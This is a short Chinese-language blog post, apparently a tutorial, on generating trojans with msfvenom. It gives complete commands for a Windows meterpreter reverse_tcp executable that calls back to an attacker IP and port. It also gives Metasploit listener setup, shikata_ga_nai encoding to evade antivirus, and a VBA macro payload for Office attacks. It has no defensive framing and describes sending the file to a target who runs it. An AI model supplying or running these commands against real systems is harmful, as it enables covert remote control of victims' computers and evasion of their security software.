利用msfvenom生成木马文件

  当我们需要往目标机上传木马文件时,我们就可以利用msfvenom生成一个木马文件,并用metersploit进行监听,就能够反弹回shell。

  我们制作的木马文件有没有免杀功能,可以在virscan中进行扫描检测一下。

https://www.virscan.org/
或者在本地用一些杀毒软件进行检测。

常规利用

  1. 生成windows木马程序。

   生成一个windows的木马应用程序:back.exe,并反弹shell至192.168.91.132:8836端口。我们可以利用metersploit进行监听

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.91.132 LPORT=8836 -f exe -o back.exe
-p 是payload,就是控制目标主机以后,要让他干什么。具体的命令就是payload.
-f 是生成的后门的格式。
-o 是输出文件名

  2. 将木马程序发送给目标机。

  3. 在自己的kali中开启metersploit。

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
show options
set LHOST 192.168.91.132 #这里的IP地址就是我们木马文件中要反弹的IP地址
set LPORT 8836
run

  4. 目标机点击了back.exe。

   当目标机运行了木马程序时,我们msf这边就上线了,一般这种的会被杀毒软件发现,要想不被发现,就要制作免杀木马程序。

 制作免杀木马

msfvenom -l encoders  #查看有哪些编码格式。
-e x86/shikata_ga_nai 对木马编码进行免杀
-i 5 指定编码5次,这个次数可以随便修改。
-b '\x00' 指定一些坏字节。

 office宏攻击的payload

msfvenom -p windows/meterpreter/reverse_tcp LHOST=ip地址 LPORT=端口 -f vba -o nouyan.vba
-f vba 是生成vba宏语言的payload.

 

posted @ 2022-03-02 17:02  三亿人  阅读(1464)  评论(0编辑  收藏  举报